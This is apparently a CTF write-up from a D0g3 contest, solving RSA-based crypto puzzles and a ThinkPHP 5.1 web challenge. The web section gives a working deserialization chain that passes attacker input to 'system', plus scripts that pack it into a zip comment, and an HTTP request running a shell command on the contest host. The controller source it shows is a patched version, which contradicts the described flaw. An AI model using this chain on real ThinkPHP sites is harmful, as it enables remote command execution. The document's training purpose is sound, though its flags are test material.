# D0g3{Welc0me_t0_iSOON_4nd_have_4_go0d_time}

'''
result=[1, 0, 7789, 1, 17598, 20447, 15475, 23040, 41318, 23644, 53369, 19347, 66418, 5457, 0, 1, 14865, 97631, 6459, 36284, 79023, 1, 157348, 44667, 185701, 116445, 23809, 220877, 0, 1, 222082, 30333, 55446, 207442, 193806, 149389, 173229, 349031, 152205, 1, 149157, 196626, 1, 222532, 10255, 46268, 171536, 0, 351788, 152678, 0, 172225, 109296, 0, 579280, 634746, 1, 668942, 157973, 1, 17884, 662728, 759841, 450490, 0, 139520, 157015, 616114, 199878, 154091, 1, 937462, 675736, 53200, 495985, 307528, 1, 804492, 790322, 463560, 520991, 436782, 762888, 267227, 306436, 1051437, 384380, 505106, 729384, 1261978, 668266, 1258657, 913103, 935600, 1, 1, 401793, 769612, 484861, 1024896, 517254, 638872, 1139995, 700201, 308216, 333502, 0, 0, 401082, 1514640, 667345, 1015119, 636720, 1011683, 795560, 783924, 1269039, 5333, 0, 368271, 1700344, 1, 383167, 7540, 1490472, 1484752, 918665, 312560, 688665, 967404, 922857, 624126, 889856, 1, 848912, 1426397, 1291770, 1669069, 0, 1709762, 130116, 1711413, 1336912, 2080992, 820169, 903313, 515984, 2211283, 684372, 2773063, 391284, 1934269, 107761, 885543, 0, 2551314, 2229565, 1392777, 616280, 1368347, 154512, 1, 1668051, 0, 2453671, 2240909, 2661062, 2880183, 1376799, 0, 2252003, 1, 17666, 1, 2563626, 251045, 1593956, 2215158, 0, 93160, 0, 2463412, 654734, 1, 3341062, 3704395, 3841103, 609968, 2297131, 1942751, 3671207, 1, 1209611, 3163864, 3054774, 1055188, 1, 4284662, 3647599, 247779, 0, 176021, 3478840, 783050, 4613736, 2422927, 280158, 2473573, 2218037, 936624, 2118304, 353989, 3466709, 4737392, 2637048, 4570953, 1473551, 0, 0, 4780148, 3299784, 592717, 538363, 2068893, 814922, 2183138, 2011758, 2296545, 5075424, 1814196, 974225, 669506, 2756080, 5729359, 4599677, 5737886, 3947814, 4852062, 1571349, 4123825, 2319244, 4260764, 1266852, 1, 3739921, 1, 5948390, 1, 2761119, 2203699, 1664472, 3182598, 6269365, 5344900, 454610, 495499, 6407607, 1, 1, 476694, 4339987, 5642199, 1131185, 4092110, 2802555, 0, 5323448, 1103156, 2954018, 1, 
1860057, 128891, 2586833, 6636077, 3136169, 1, 3280730, 6970001, 1874791, 48335, 6229468, 6384918, 5412112, 1, 7231540, 7886316, 2501899, 8047283, 2971582, 354078, 401999, 6427168, 4839680, 1, 44050, 3319427, 0, 1, 1452967, 4620879, 5525420, 5295860, 643415, 5594621, 951449, 1996797, 2561796, 6707895, 7072739]
ll=len(result)
list_p = sieve_base[0:ll]
list_q = sieve_base[ll:2*ll]
dq=''
for i in range(ll):
p=list_p[i]
q=list_q[i]
f=False
for j in range(10):
if pow(j,65537,p*q)==result[i]:
dq+=str(j)
f=True
break
if not f:
print('error')

print(dq)
'''
'''
#py2
import random
seeds=[3, 0, 39, 78, 14, 49, 73, 83, 55, 48, 30, 28, 23, 16, 54, 23, 68, 7, 20, 8, 98, 68, 45, 36, 97, 13, 83, 68, 16, 59, 81, 26, 51, 45, 36, 60, 36, 94, 58, 11, 19, 33, 95, 12, 60, 38, 51, 95, 21, 3, 38, 72, 47, 80, 7, 20, 26, 80, 18, 43, 92, 4, 64, 93, 91, 12, 86, 63, 46, 73, 89, 5, 91, 17, 88, 94, 80, 42, 90, 14, 45, 53, 91, 16, 28, 81, 62, 63, 66, 20, 81, 3, 43, 99, 54, 22, 2, 27, 2, 62, 88, 99, 78, 25, 76, 49, 28, 96, 95, 57, 94, 53, 32, 58, 32, 72, 89, 15, 4, 78, 89, 74, 86, 45, 51, 65, 13, 75, 95, 42, 20, 77, 34, 66, 56, 20, 26, 18, 28, 11, 88, 62, 72, 27, 74, 42, 63, 76, 82, 97, 75, 92, 1, 5, 20, 78, 46, 85, 81, 54, 64, 87, 37, 91, 38, 39, 1, 90, 61, 28, 13, 60, 37, 90, 87, 15, 78, 91, 99, 58, 62, 73, 70, 56, 82, 5, 19, 54, 76, 88, 4, 3, 55, 3, 3, 22, 85, 67, 98, 28, 32, 42, 48, 96, 69, 3, 83, 48, 26, 20, 45, 16, 45, 47, 92, 0, 54, 4, 73, 8, 31, 38, 3, 10, 84, 60, 59, 69, 64, 91, 98, 73, 81, 98, 9, 70, 44, 44, 24, 95, 83, 49, 31, 19, 89, 18, 20, 78, 86, 95, 83, 23, 42, 51, 95, 80, 48, 46, 88, 7, 47, 64, 55, 4, 62, 37, 71, 75, 98, 67, 98, 58, 66, 70, 24, 58, 56, 44, 11, 78, 1, 78, 89, 97, 83, 72, 98, 12, 41, 33, 14, 40, 27, 5, 18, 35, 25, 31, 69, 97, 84, 47, 25, 90, 78, 15, 72, 71]

rand='[54, 36, 60] [84, 42, 25] [20, 38, 39] [81, 9, 92] [70, 65, 94] [6, 11, 75] [27, 50, 46] [49, 85, 8] [95, 14, 73] [54, 71, 30] [53, 28, 65] [11, 13, 59] [94, 89, 8] [36, 41, 44] [91, 13, 48] [92, 94, 89] [94, 74, 90] [32, 65, 7] [90, 68, 90] [22, 96, 12] [83, 35, 5] [74, 74, 90] [27, 48, 33] [32, 98, 95] [80, 37, 84] [25, 68, 84] [49, 85, 37] [74, 94, 74] [48, 41, 44] [22, 94, 2] [50, 45, 38] [74, 20, 20] [50, 16, 82] [27, 8, 33] [32, 98, 91] [30, 57, 26] [98, 95, 91] [54, 28, 43] [58, 20, 94] [45, 55, 92] [78, 52, 51] [57, 81, 27] [76, 51, 53] [47, 65, 66] [57, 26, 80] [63, 72, 6] [24, 50, 82] [76, 51, 99] [68, 63, 47] [23, 36, 60] [63, 42, 6] [7, 59, 98] [43, 45, 34] [27, 70, 95] [32, 15, 7] [90, 68, 76] [20, 20, 60] [27, 70, 95] [18, 66, 19] [3, 69, 14] [56, 55, 58] [23, 39, 15] [47, 63, 92] [91, 49, 56] [17, 68, 16] [47, 66, 14] [79, 3, 31] [44, 29, 90] [39, 58, 85] [27, 56, 46] [8, 60, 14] [62, 74, 79] [17, 68, 16] [52, 96, 28] [39, 18, 62] [54, 12, 28] [54, 70, 95] [63, 27, 22] [20, 9, 58] [10, 70, 65] [48, 8, 33] [61, 45, 71] [8, 17, 16] [36, 48, 41] [13, 59, 17] [50, 55, 38] [92, 17, 23] [44, 29, 90] [43, 24, 44] [90, 76, 90] [50, 45, 38] [23, 54, 36] [69, 14, 46] [40, 17, 24] [91, 13, 48] [95, 14, 2] [94, 5, 8] [64, 95, 19] [95, 94, 8] [92, 17, 97] [18, 90, 62] [40, 17, 24] [81, 9, 73] [37, 92, 84] [95, 20, 29] [6, 11, 75] [11, 13, 17] [37, 90, 39] [51, 99, 53] [4, 1, 51] [54, 12, 43] [61, 89, 45] [21, 30, 90] [58, 64, 94] [7, 21, 90] [7, 59, 98] [60, 99, 14] [96, 73, 15] [23, 10, 15] [81, 9, 92] [60, 99, 14] [85, 11, 12] [79, 3, 31] [27, 48, 8] [50, 16, 82] [41, 84, 44] [25, 68, 84] [45, 43, 4] [51, 99, 53] [63, 27, 22] [90, 68, 90] [79, 32, 24] [58, 84, 89] [7, 24, 44] [96, 55, 52] [90, 68, 76] [20, 20, 60] [18, 33, 19] [11, 13, 17] [45, 55, 92] [18, 90, 62] [92, 97, 23] [7, 59, 34] [64, 70, 95] [51, 11, 12] [63, 27, 22] [44, 29, 48] [37, 95, 20] [48, 50, 96] [19, 37, 84] [45, 43, 76] [42, 56, 55] [84, 76, 25] [62, 79, 94] [90, 68, 90] [81, 9, 92] 
[39, 58, 85] [19, 10, 90] [50, 45, 38] [91, 13, 55] [63, 40, 92] [14, 83, 54] [68, 9, 84] [8, 17, 68] [42, 72, 6] [20, 19, 39] [13, 84, 25] [20, 9, 65] [55, 80, 32] [11, 59, 17] [25, 68, 84] [30, 57, 26] [9, 61, 84] [20, 65, 58] [14, 18, 54] [96, 1, 73] [9, 92, 73] [8, 68, 16] [40, 20, 24] [58, 20, 64] [17, 97, 23] [27, 56, 46] [90, 29, 13] [96, 55, 47] [48, 50, 96] [62, 79, 94] [67, 78, 51] [91, 13, 55] [95, 20, 29] [39, 90, 62] [23, 10, 15] [23, 54, 36] [95, 14, 73] [23, 36, 60] [23, 54, 60] [95, 14, 2] [61, 10, 90] [7, 97, 41] [35, 83, 5] [11, 13, 59] [21, 30, 90] [63, 27, 22] [54, 13, 30] [37, 90, 39] [9, 16, 60] [23, 36, 60] [49, 85, 37] [54, 13, 71] [20, 20, 60] [90, 76, 90] [27, 48, 33] [36, 48, 41] [48, 8, 33] [35, 45, 34] [42, 56, 58] [84, 75, 42] [13, 55, 48] [23, 39, 15] [27, 50, 46] [22, 96, 12] [11, 39, 68] [63, 72, 6] [23, 54, 60] [57, 42, 57] [91, 3, 0] [30, 26, 80] [22, 93, 2] [68, 9, 16] [63, 40, 92] [8, 68, 16] [35, 83, 5] [27, 50, 56] [45, 55, 38] [35, 35, 5] [46, 37, 86] [90, 29, 45] [54, 86, 17] [40, 86, 17] [71, 83, 99] [76, 51, 99] [85, 8, 37] [6, 11, 75] [1, 11, 68] [67, 78, 52] [60, 99, 14] [18, 33, 19] [90, 68, 90] [81, 9, 92] [3, 83, 31] [76, 99, 53] [49, 85, 37] [92, 94, 89] [2, 27, 22] [24, 16, 82] [76, 51, 53] [27, 54, 70] [13, 71, 30] [88, 58, 85] [39, 18, 62] [32, 15, 65] [43, 45, 34] [47, 40, 92] [9, 95, 73] [23, 10, 39] [17, 97, 23] [68, 61, 84] [32, 62, 98] [45, 43, 4] [83, 35, 5] [7, 97, 41] [35, 83, 5] [58, 20, 64] [43, 24, 44] [90, 45, 13] [71, 83, 99] [58, 20, 64] [55, 47, 52] [40, 86, 17] [45, 55, 46] [81, 9, 92] [84, 76, 25] [81, 92, 73] [8, 60, 14] [19, 80, 37] [85, 8, 37] [7, 98, 34] [35, 83, 5] [47, 65, 66] [23, 16, 91] [57, 81, 27] [10, 70, 94] [45, 87, 3] [70, 95, 19] [62, 79, 94] [18, 66, 19] [54, 75, 74] [92, 84, 21] [1, 39, 68] [68, 9, 60] [19, 80, 37] [91, 3, 0] [35, 45, 34] [37, 92, 21] [20, 9, 65] [9, 92, 73] [96, 73, 15] [7, 59, 34] [32, 62, 0]'
result=[-38, -121, -40, -125, -51, -29, -2, -21, -59, -54, -51, -40, -105, -5, -4, -50, -127, -56, -124, -128, -23, -104, -63, -112, -34, -115, -58, -99, -24, -102, -1, -5, -34, -3, -104, -103, -21, -62, -121, -24, -115, -9, -87, -56, -39, -30, -34, -4, -33, -5, -114, -21, -19, -7, -119, -107, -115, -6, -25, -27, -32, -62, -28, -20, -60, -121, -102, -10, -112, -7, -85, -110, -62, -100, -110, -29, -41, -55, -113, -112, -45, -106, -125, -25, -57, -27, -83, -2, -51, -118, -2, -10, -50, -40, -1, -82, -111, -113, -50, -48, -23, -33, -112, -38, -29, -26, -4, -40, -123, -4, -44, -120, -63, -38, -41, -22, -50, -50, -17, -122, -61, -5, -100, -22, -44, -47, -125, -125, -127, -55, -117, -100, -2, -26, -32, -111, -123, -118, -16, -24, -20, -40, -92, -40, -102, -49, -99, -45, -59, -98, -49, -13, -62, -128, -121, -114, -112, -13, -3, -4, -26, -35, -15, -35, -8, -18, -125, -14, -6, -60, -113, -104, -120, -64, -104, -55, -104, -41, -34, -106, -105, -2, -28, -14, -58, -128, -3, -1, -17, -38, -18, -12, -59, -4, -19, -82, -40, -122, -18, -42, -53, -60, -113, -40, -126, -15, -63, -40, -124, -114, -58, -26, -35, -26, -8, -48, -112, -52, -11, -117, -52, -32, -21, -38, -124, -13, -103, -6, -30, -33, -28, -31, -1, -97, -59, -64, -28, -1, -40, -2, -10, -26, -24, -3, -50, -113, -125, -122, -124, -5, -50, -62, -11, -8, -88, -109, -7, -31, -105, -54, -28, -8, -62, -58, -101, -58, -53, -124, -18, -124, -17, -109, -52, -45, -40, -109, -85, -7, -108, -121, -58, -49, -91, -102, -8, -10, -17, -55, -19, -11, -116, -47, -120, -121, -23, -99, -19, -51, -36, -110, -126, -29, -110, -9, -97, -54, -83, -86]
l=len(result)
rand=[]
dp=''
for j in range(0,l):
random.seed(seeds[j])
rands=[]
for k in range(0,4):
rands.append(random.randint(0,99))
rand.append(rands)
x=rands[j%4]
f=False
for i in range(255):
if (~i|rands[j%4]) & (i|~rands[j%4]) ==result[j]:
dp+=chr(i)
f=True
if not f:
print('error')
print(dp)
'''

ez_equation

给了一个方程,我们设三个未知数为a,b,c,那么M1=a*a*b+b*b*a+b*b+a*b

M2=b*b*(c+1)+a*b*(c+1)-2

首先gcd(M1,M2+2)=kb

那么gcd(kb,b)=b

先求出b,然后M1,M2两个方程两个未知数,用z3直接梭出a,c

最后还有两个因子是相邻的,直接扔yafu或者开方取前后两个素数

最后再rsa解密

# From the prose above: M1 = a*a*b + b*b*a + b*b + a*b and M2 = b*b*(c+1) + a*b*(c+1) - 2,
# so both M1 and M2+2 are multiples of b and their gcd is k*b for some cofactor k.
M1= 3826382835023788442651551584905620963555468828948525089808250303867245240492543151274589993810948153358311949129889992078565218014437985797623260774173862776314394305207460929010448541919151371739763413408901958357439883687812941802749556269540959238015960789123081724913563415951118911225765239358145144847672813272304000303248185912184454183649550881987218183213383170287341491817813853157303415010621029153827654424674781799037821018845093480149146846916972070471616774326658992874624717335369963316741346596692937873980736392272357429717437248731018333011776098084532729315221881922688633390593220647682367272566275381196597702434911557385351389179790132595840157110385379375472525985874178185477024824406364732573663044243615168471526446290952781887679180315888377262181547383953231277148364854782145192348432075591465309521454441382119502677245090726728912738123512316475762664749771002090738886940569852252159994522316
M2= 4046011043117694641224946060698160981194371746049558443191995592417947642909277226440465640195903524402898673255622570650810338780358645872293473212692240675287998097280715739093285167811740252792986119669348108850168574423371861266994630851360381835920384979279568937740516573412510564312439718402689547377548575653450519989914218115265842158616123026997554651983837361028152010675551489190669776458201696937427188572741833635865019931327548900804323792893273443467251902886636756173665823644958563664967475910962085867559357008073496875191391847757991101189003154422578662820049387899402383235828011830444034463049749668906583814229827321704450021715601349950406035896249429068630164092309047645766216852109121662629835574752784717997655595307873219503797996696389945782836994848995124776375146245061787647756704605043856735398002012276311781956668212776588970619658063515356931386886871554860891089498456646036630114620806

# RSA modulus; the asserts further down confirm n == a*b*c*p*q.
n=19445950132976386911852381666731799463510958712950274248183192405937223343228119407660772413067599252710235310402278345391806863116119010697766434743302798644091220730819441599784039955347398797545219314925103529062092963912855489464914723588833817280786158985269401131919618320866942737291915603551320163001129725430205164159721810319128999027215168063922977994735609079166656264150778896809813972275824980250733628895449444386265971986881443278517689428198251426557591256226431727934365277683559038777220498839443423272238231659356498088824520980466482528835994554892785108805290209163646408594682458644235664198690503128767557430026565606308422630014285982847395405342842694189025641950775231191537369161140012412147734635114986068452144499789367187760595537610501700993916441274609074477086105160306134590864545056872161818418667370690945602050639825453927168529154141097668382830717867158189131567590506561475774252148991615602388725559184925467487450078068863876285937273896246520621965096127440332607637290032226601266371916124456122172418136550577512664185685633131801385265781677598863031205194151992390159339130895897510277714768645984660240750580001372772665297920679701044966607241859495087319998825474727920273063120701389749480852403561022063673222963354420556267045325208933815212625081478538158049144348626000996650436898760300563194390820694376019146835381357141426987786643471325943646758131021529659151319632425988111406974492951170237774415667909612730440407365124264956213064305556185423432341935847320496716090528514947
from gmpy2 import *
from Crypto.Util.number import *
b=int(gcd(M1,M2+2))
# The prose takes gcd(k*b, b); the code instead takes the gcd with n, which strips the
# cofactor k as long as k shares no factor with n — the later asserts are what check this.
b=int(gcd(b,n))
print(b)
'''
from z3 import *
s=Solver()
a,c=Ints('a c')
s.add(a*a*b+b*b*a+b*b+a*b==M1)
s.add(b*b*(c+1)+a*b*(c+1)-2==M2)
if s.check()==sat:
print(s.model())
'''
# a and c as reported by the z3 solve in the commented-out block above.
# (`c` is the third factor here; the same name is rebound to the ciphertext below.)
c=124117415943883977664751123530312411127969752596554845224788157371311249476587435058606174560086595402130942432433077285727410486606936603436679072115481556559754023776771158788066029212482977191449912364572356973349619609634451941137428490832382800157920373064845282558903378297473815085357523566726409862651
a=117379993488408909213785887974472229016071265566403849836216754847295401565166151872329440545598767396499252325133419296775798211888305050776586647999185549171166433935032159605367762650398185050063643611720499373962310459705000471248897299568458251778545586376091559089442503748421906239117101764062329447353
assert n%(a*b*c)==0
# Remaining cofactor is p*q; the prose says these are neighbouring primes (yafu / sqrt and step to the primes either side).
p_q=n//(a*b*c)
print(p_q)
p=100879187056056327845688098549406745424207361197423093269692717108477600868962896860013904736765795306101216828969899092854909669522132180587302621989436957151756194757478353967989066938767945991388791271155482274102738851937877875741607885045831857778368069892408823414883083227349949611641923542904479147403
q=100879187056056327845688098549406745424207361197423093269692717108477600868962896860013904736765795306101216828969899092854909669522132180587302621989436957151756194757478353967989066938767945991388791271155482274102738851937877875741607885045831857778368069892408823414883083227349949611641923542904479146623
# Euler's totient for a 5-factor modulus — valid only if a, b, c, p, q are distinct primes;
# the asserts check the product, not primality.
phi=(p-1)*(q-1)*(a-1)*(b-1)*(c-1)

assert n==a*b*c*p*q
d=invert(0x10001,phi)
# `c` is rebound here from the factor to the RSA ciphertext; all uses of the factor are above.
c=1394946766416873131554934453357121730676319808212515786127918041980606746238793432614766163520054818740952818682474896886923871330780883504028665380422608364542618561981233050210507202948882989763960702612116316321009210541932155301216511791505114282546592978453573529725958321827768703566503841883490535620591951871638499011781864202874525798224508022092610499899166738864346749753379399602574550324310119667774229645827773608873832795828636770263111832990012205276425559363977526114225540962861740929659841165039419904164961095126757294762709194552018890937638480126740196955840656602020193044969685334441405413154601311657668298101837066325231888411018908300828382192203062405287670490877283269761047853117971492197659115995537837080400730294215778540754482680476723953659085854297184575548489544772248049479632420289954409052781880871933713121875562554234841599323223793407272634167421053493995795570508435905280269774274084603687516219837730100396191746101622725880529896250904142333391598426588238082485305372659584052445556638990497626342509620305749829144158797491411816819447836265318302080212452925144191536031249404138978886262136129250971366841779218675482632242265233134997115987510292911606736878578493796260507458773824689843424248233282828057027197528977864826149756573867022173521177021297886987799897923182290515542397534652789013340264587028424629766689059507844211910072808286250914059983957934670979551428204569782238857331272372035625901349763799005621577332502957693517473861726359829588419409120076625939502382579605
m=pow(c,d,n)
# Only the tail of the decrypted message holds the flag; the first 256 bytes are skipped.
print(long_to_bytes(m)[256:])
#D0g3{296b680c-7aeb-5272-8b33-7335b411fbcb}

Strange

加密的是m|hint,给了m&hint和hint

首先根据hint和m&hint可以知道m中哪些比特为1

然后把这些已知为1的比特固定下来,把其它未知的比特设为x,这样就满足Coppersmith已知部分明文攻击的条件,可以求出m|hint。最后,当m&hint的某一比特位为1时,m对应位为1;当m|hint的某位为1且hint对应位为0时,m对应位也为1。综上可以还原m的所有比特位。

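# "Strange": RSA with e = 3 encrypts m | hint; we are handed n, c, m & hint
# and hint itself and must recover m.  The bits of m that fall inside hint
# are fixed by m & hint; the bits outside hint are the unknown low part of
# the plaintext m | hint = hint + x with x < 2^400, which Coppersmith's
# known-high-bits (small root) attack recovers -- see the sage snippet below.
n,c,m2,hint=[13002904520196087913175026378157676218772224961198751789793139372975952998874109513709715017379230449514880674554473551508221946249854541352973100832075633211148140972925579736088058214014993082226530875284219933922497736077346225464349174819075866774069797318066487496627589111652333814065053663974480486379799102403118744672956634588445292675676671957278976483815342400168310432107890845293789670795394151784569722676109573685451673961309951157399183944789163591809561790491021872748674809148737825709985578568373545210653290368264452963080533949168735319775945818152681754882108865201849467932032981615400210529003, 8560367979088389639093355670052955344968008917787780010833158290316540154791612927595480968370338549837249823871244436946889198677945456273317343886485741297260557172704718731809632734567349815338988169177983222118718585249696953103962537942023413748690596354436063345873831550109098151014332237310265412976776977183110431262893144552042116871747127301026195142320678244525719655551498368460837394436842924713450715998795899172774573341189660227254331656916960984157772527015479797004423165812493802730996272276613362505737536007284308929288293814697988968407777480072409184261544708820877153825470988634588666018802, 9869907877594701353175281930839281485694004896356038595955883788511764488228640164047958227861871572990960024485992, 9989639419782222444529129951526723618831672627603783728728767345257941311870269471651907118545783408295856954214259681421943807855554571179619485975143945972545328763519931371552573980829950864711586524281634114102102055299443001677757487698347910133933036008103313525651192020921231290560979831996376634906893793239834172305304964022881699764957699708192080739949462316844091240219351646138447816969994625883377800662643645172691649337353080140418336425506119542396319376821324619330083174008060351210307698279022584862990749963452589922185709026197210591472680780996507882639014068600165049839680108974873361895144]

# Bit width of the values being reconstructed; printed as a sanity check.
print(hint.bit_length())

# Sage (run separately) that produced the unknown part of m | hint.  The
# known high part mbar is the hint value itself, and the root is bounded by
# 2^400, which is small enough for small_roots() with e = 3:
#
#   def decrypt(n, e, c, mbar, kbits):
#       PR.<x> = PolynomialRing(Zmod(n))
#       f = (mbar + x)^e - c
#       x0 = f.small_roots(X=2^kbits, beta=1)[0]
#       print(x0)
#
#   decrypt(n, 3, c, hint, 400)

# The Coppersmith root x0 = (m | hint) - hint, i.e. exactly the bits of m
# that lie outside hint (it is far shorter than hint for that reason).
hh=625351281758775854436696750193519647852347112455593164676552831622184938221557439012947515328144260585439847522581


def recover_m(m_and_hint: int, hint: int, m_outside: int) -> int:
    """Return m from m & hint, hint and the bits of m outside hint.

    Args:
        m_and_hint: the value m & hint.
        hint: the mask that was given out with the challenge.
        m_outside: either m | hint or (m | hint) - hint == m & ~hint; only
            the bits outside hint are consulted, so both forms yield m.

    Returns:
        (m & hint) | (m & ~hint), which is m.

    Working on integers instead of bin()/zfill() bit lists also avoids the
    silent misalignment the list form would suffer if the third value had
    more bits than hint.
    """
    return m_and_hint | (m_outside & ~hint)


m = recover_m(m2, hint, hh)
# Same bytes as Crypto.Util.number.long_to_bytes(m) for m >= 0, without the
# third-party dependency (max(1, ...) keeps the b'\x00' result for m == 0).
print(m.to_bytes(max(1, (m.bit_length() + 7) // 8), "big"))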

#D0g3{R54_f4l1_1n_l0ve_with_CopperSmith_w0wow0!!}

Web

Ez_TP

存在文件泄露 www.zip

\application\index\controller\Index.php

<?php
namespace app\index\controller;
use think\Controller;

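class Index extends Controller
{
    /**
     * Default page: the stock ThinkPHP 5.1 welcome markup.
     *
     * @return string HTML returned verbatim to the client.
     */
    public function index()
    {
        return '<style type="text/css">*{ padding: 0; margin: 0; } div{ padding: 4px 48px;} a{color:#2E5CD5;cursor: pointer;text-decoration: none} a:hover{text-decoration:underline; } body{ background: #fff; font-family: "Century Gothic","Microsoft yahei"; color: #333;font-size:18px;} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.6em; font-size: 42px }</style><div style="padding: 24px 48px;"> <h1>:) </h1><p> ThinkPHP V5.1<br/><span style="font-size:30px">12载初心不改(2006-2018) - 你值得信赖的PHP框架</span></p></div><script type="text/javascript" src="https://tajs.qq.com/stats?sId=64890268" charset="UTF-8"></script><script type="text/javascript" src="https://e.topthink.com/Public/static/client.js"></script><think id="eab4b9f840753f8e7"></think>';
    }

    /**
     * Write a fixed greeting to hello.txt and echo one allowlisted file.
     *
     * The original handler ran extract() over the parse_str() output of a
     * request parameter, so any local could be overwritten from outside:
     * $hello chose the bytes written to hello.txt and $a chose the path
     * (or stream wrapper such as phar://) handed to file_get_contents(),
     * which is the variable-overwrite -> file write -> deserialization
     * chain used in the writeup.  Here request data never becomes a
     * variable name, the written content is constant, and the readable
     * path is compared against an allowlist, so neither the content nor
     * the wrapper/path is attacker-controlled.
     */
    public function hello()
    {
        // Deliberately discloses this controller's source (challenge design).
        highlight_file(__FILE__);
        // Constant content: no request value can change what gets written.
        $hello = base64_encode('Welcome to D0g3');
        if (isset($_GET['hello']) || isset($_POST['hello'])) exit;

        // Only these names may be read; the default remains hello.txt.
        $allowed = ['hello.txt'];
        $a = 'hello.txt';
        if (isset($_REQUEST['world'])) {
            // Parse into a local array instead of extract()-ing into scope.
            parse_str((string) $_REQUEST['world'], $params);
            if (isset($params['a']) && is_string($params['a'])
                && in_array($params['a'], $allowed, true)) {
                $a = $params['a'];
            }
        }

        $s = base64_decode($hello);
        file_put_contents('hello.txt', $s);
        echo file_get_contents($a);
    }
}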

可以通过world参数注册变量,从而覆盖$a和$hello

鉴于题目环境是5.1.37,应该是通过file_get_contents触发phar反序列化。

实测直接使用phar格式会报错,原因是限制了数据大小,因此考虑通过其他格式触发

poc:

<?php
namespace think;
// Stand-in for the framework's think\Model: only the properties this payload
// sets are declared, under the same names and visibilities, so serialize()
// emits them the way the real class would store them (a protected property
// serializes as "\0*\0append", a private one as "\0think\Model\0data" --
// these NUL bytes are why the payload is later rewritten with S: strings).
abstract class Model{
    protected $append = [];
    private $data = [];
    function __construct(){
        // NOTE(review): "lin" is the key used in both arrays and the nested
        // Request carries the function name to apply; presumably the framework
        // joins the two by key -- confirm against the ThinkPHP 5.1 sources.
        $this->append = ["lin"=>["calc.exe","calc"]];
        $this->data = ["lin"=>new Request()];
    }
}
// Stand-in for think\Request declaring the three properties the payload needs.
class Request
{
    protected $hook = [];
    // Name of a PHP function; the value chosen here is what gives the chain
    // its impact, and is also the most distinctive string to look for when
    // inspecting a suspicious serialized blob.
    protected $filter = "system";
    protected $config = [
        // form variable used to mark a request as AJAX
        'var_ajax' => '_ajax',
    ];
    function __construct(){
        $this->filter = "system";
        // var_ajax names the request parameter that gets read; the final HTTP
        // request on this page supplies it as the "lin" form field.
        $this->config = ["var_ajax"=>'lin'];
        // Registers isAjax() under the hook name "visible"; presumably this is
        // the method the framework invokes on the object -- confirm in Request.php.
        $this->hook = ["visible"=>[$this,"isAjax"]];
    }
}


namespace think\process\pipes;

use think\model\concern\Conversion;
use think\model\Pivot;
// Stand-in for think\process\pipes\Windows, the outermost object of the chain
// (it is the one serialized at the bottom of this file).  Its only serialized
// state is the private $files array holding a Pivot model; the class path
// "think\process\pipes\Windows" therefore appears verbatim at the start of
// the payload.
class Windows
{
    private $files = [];

    public function __construct()
    {
        $this->files=[new Pivot()];
    }
}
namespace think\model;

use think\Model;

// Concrete subclass of the abstract Model stub so that it can be instantiated;
// it is declared in the think\model namespace so the serialized class name
// matches the framework's own pivot model class.
class Pivot extends Model
{
}
use think\process\pipes\Windows;
// Serialize the outermost object and base64-encode it for transport; the
// process_serialized() script further down rewrites the NUL bytes before the
// blob is placed in a zip archive comment.
echo base64_encode(serialize(new Windows()));
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
?>

将序列化内容写入zip注释,需要对特殊字符进行替换

<?php
//bypass %00
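/**
 * Rewrite every serialized string token s:N:"..." as S:N:"..." with
 * non-printable bytes and backslashes escaped as \xx.
 *
 * S: is the hex-escaped string form that unserialize() accepts, so a payload
 * containing NUL bytes (e.g. the \0*\0 prefix of protected property names)
 * survives channels that strip or reject raw NUL.  A token is rewritten only
 * when its declared length lands exactly on a closing '";', so an "s:3:"
 * that merely occurs inside string content is left untouched.
 *
 * Changes from the original: the end-of-input check is '>=' rather than '>'
 * (a string token that ends the input was never converted), and the
 * $string{$i} offset syntax, removed in PHP 8, is replaced by $string[$i].
 *
 * @param string $serialized  Output of serialize().
 * @return string             Same value with s: strings converted to S:.
 */
function process_serialized($serialized) {
    $new = '';
    $last = 0;
    $current = 0;
    $len = strlen($serialized);
    $pattern = '#\bs:([0-9]+):"#';

    while (
        $current < $len &&
        preg_match($pattern, $serialized, $matches, PREG_OFFSET_CAPTURE, $current)
    ) {
        $p_start = $matches[0][1];
        $p_start_string = $p_start + strlen($matches[0][0]);
        $length = (int) $matches[1][0];
        $p_end_string = $p_start_string + $length;

        // Only a genuine serialized string has '";' right after the declared
        // length; anything else is content, so resume scanning after the token.
        if (!(
            $len >= $p_end_string + 2 &&
            substr($serialized, $p_end_string, 2) == '";'
        )) {
            $current = $p_start_string;
            continue;
        }
        $string = substr($serialized, $p_start_string, $length);

        // Escape every non-printable byte, and the backslash itself, as \xx.
        $clean_string = '';
        for ($i = 0; $i < strlen($string); $i++) {
            $letter = $string[$i];
            $clean_string .= (ctype_print($letter) && $letter != '\\')
                ? $letter
                : sprintf("\\%02x", ord($letter));
        }

        // Copy the untouched prefix, then the rewritten token.
        $new .= substr($serialized, $last, $p_start - $last)
              . 'S:' . $matches[1][0] . ':"' . $clean_string . '";';
        $last = $p_end_string + 2;
        $current = $last;
    }

    $new .= substr($serialized, $last);
    return $new;
}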

生成zip文件

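<?php
// Build 2.zip whose archive comment carries the NUL-escaped payload.
include ("test4.php");   // provides process_serialized()
$p = "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";
// Strict decoding: a typo in the pasted base64 fails here instead of
// silently producing a garbage comment.
$b = base64_decode($p, true);
if ($b === false) {
    fwrite(STDERR, "payload is not valid base64\n");
    exit(1);
}

echo process_serialized($b);

$b = process_serialized($b);

$zip = new ZipArchive();
// open() returns true on success or an integer error code; the original
// script stored it in $res and never checked it.
$res = $zip->open('2.zip', ZipArchive::CREATE);
if ($res !== true) {
    fwrite(STDERR, "cannot open 2.zip (ZipArchive error $res)\n");
    exit(1);
}
$zip->addFromString('ttt.txt', 'ttt');
$zip->setArchiveComment($b);
$zip->close();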

读入zip文件并进行base64和URL编码

// URL-encode the base64 so the raw zip bytes can be carried as a form field value.
echo urlencode(base64_encode(file_get_contents("2.zip")));

请求获取flag:

POST /?s=/index/index/hello&lin=cat+/y0u_f0und_It HTTP/1.1
Host: 1.12.220.15:19274
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 773

